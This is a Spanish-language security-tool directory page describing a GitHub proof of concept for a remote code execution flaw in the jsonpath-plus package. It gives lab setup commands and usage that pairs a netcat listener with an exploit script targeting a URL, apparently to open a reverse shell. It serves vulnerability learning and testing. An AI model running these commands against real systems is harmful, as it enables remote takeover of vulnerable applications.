Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-1302 — JSONPath-plus Ejecución Remota de Código | Kitploit
Herramientas/GitHubGitHub/eqstlab/cve-2025-1302
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubeqstlab/cve-2025-1302

CVE-2025-1302

JSONPath-plus Ejecución Remota de Código

Ver Repositorio
201hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-1302

★ CVE-2025-1302 JSONPath-plus RCE PoC ★

https://github.com/user-attachments/assets/5d791540-ef6c-4cd0-bd25-7a1dbbd194fb

Configuración del laboratorio

root@kitploit:~
docker build -t jsonpath:10.2.0 .
docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0

localhost:3000 image

Descripción

Las versiones del paquete jsonpath-plus anteriores a la 10.3.0 son vulnerables a la Ejecución Remota de Código (RCE) debido a una sanitización inadecuada de las entradas. Un atacante puede ejecutar código arbitrario en el sistema explotando el uso inseguro por defecto del modo eval='safe'. Nota: Esto se debe a una corrección incompleta para CVE-2024-21534.

Cómo usar

Clonar con Git

root@kitploit:~
git clone https://github.com/EQSTLab/CVE-2025-1302.git
cd CVE-2025-1302

Instalar paquetes

root@kitploit:~
pip install -r requirements.txt

Comando

root@kitploit:~
nc -l -p <LPORT>
python3 CVE-2025-1302.py -u <URL_TO_EXPLOIT> -i <LHOST> -p <LPORT>

Salida

image

Resultado

image

Descargo de responsabilidad

Este repositorio no pretende ser un exploit de RCE para CVE-2025-1302. El propósito de este proyecto es ayudar a las personas a aprender sobre esta vulnerabilidad y, quizás, probar sus propias aplicaciones.

EQST Insight

Publicamos análisis de CVE y malware una vez al mes. Si estás interesado, sigue los enlaces de abajo para consultar nuestras publicaciones. https://www.skshieldus.com/eng/business/insight.do

Descargar herramienta